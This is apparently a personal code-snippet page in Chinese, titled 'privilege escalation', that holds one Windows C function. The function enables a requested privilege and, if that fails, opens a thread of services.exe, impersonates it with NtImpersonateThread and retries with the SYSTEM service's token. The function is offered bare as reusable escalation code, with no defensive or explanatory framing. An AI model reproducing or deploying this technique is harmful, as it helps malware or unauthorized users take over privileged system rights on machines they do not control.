[关闭]
@FadeTrack 2017-05-24T16:11:48.000000Z 字数 1443 阅读 1910

代码库

未分类


提权:

  1. BOOL GetPrivilege(ULONG Priviliage)
  2. {
  3. BOOL bRet = FALSE;
  4. NTSTATUS St;
  5. BOOLEAN bEnable;
  6. bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,FALSE,&bEnable)) || NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable));
  7. if (!bRet)
  8. {
  9. PSYSTEM_PROCESSES_INFORMATION Processes = (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);
  10. if (Processes)
  11. {
  12. UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");
  13. for (PSYSTEM_PROCESSES_INFORMATION Proc=Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta)
  14. {
  15. if (RtlEqualUnicodeString(&Proc->ProcessName,&ProcessName,TRUE))
  16. {
  17. HANDLE hThread;
  18. OBJECT_ATTRIBUTES ObjAttr;
  19. InitializeObjectAttributes(&ObjAttr,NULL,0,0,0);
  20. St = NtOpenThread(&hThread,THREAD_DIRECT_IMPERSONATION,&ObjAttr,&Proc->Threads[0].ClientId);
  21. if (NT_SUCCESS(St))
  22. {
  23. SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};
  24. SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
  25. SecurityQos.ImpersonationLevel = SecurityImpersonation;
  26. SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
  27. St = NtImpersonateThread(NtCurrentThread(),hThread,&SecurityQos);
  28. if (NT_SUCCESS(St))
  29. {
  30. St = RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable);
  31. bRet = NT_SUCCESS(St);
  32. if (!bRet)
  33. {
  34. DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n",St);
  35. }
  36. }
  37. else
  38. {
  39. DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n",St);
  40. }
  41. NtClose(hThread);
  42. }
  43. else
  44. {
  45. DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n",St);
  46. }
  47. break;
  48. }
  49. if (!Proc->NextEntryDelta) break;
  50. }
  51. free(Processes);
  52. }
  53. }
  54. return bRet;
  55. }
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注